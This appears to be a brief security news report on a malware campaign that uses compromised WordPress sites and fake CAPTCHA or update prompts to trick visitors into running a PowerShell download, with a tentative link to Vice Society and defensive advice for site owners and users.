Lorem Ipsum Malware Shifts to ClickFix Delivery, Linked to Vice Society

Researchers have identified a shift in the delivery method for the so-called Lorem Ipsum malware campaign, which relies on compromised WordPress sites. The threat actors have pivoted to a 'ClickFix' technique, tricking users into executing malicious code under the guise of resolving a fake error or update prompt.

The campaign's connection to the ransomware and data extortion group Vice Society has emerged from new analysis, though attribution remains unconfirmed. The scale of compromise and number of affected sites has not been disclosed, but the use of widely-trusted WordPress infrastructure expands the potential victim pool.

Attackers inject malicious scripts into legitimate WordPress sites, often through stolen credentials or unpatched plugins. When a visitor lands on the compromised page, a fake CAPTCHA or browser update notification prompts them to copy and run a PowerShell command, which downloads the payload. Indicators of compromise include unexpected PowerShell executions and outbound connections to known malicious domains.

No specific patches are available for this campaign since it exploits site-level vulnerabilities rather than a single software flaw. Site administrators should immediately rotate credentials, audit plugins and themes, and implement web application firewalls. Users are advised to avoid copying commands from untrusted browser prompts.

The broader threat landscape remains active, with ransomware groups increasingly adopting multiple extortion tactics and access brokers leveraging legitimate services for initial compromise. The Lorem Ipsum campaign's evolving delivery mechanism underscores the need for continuous monitoring of web assets.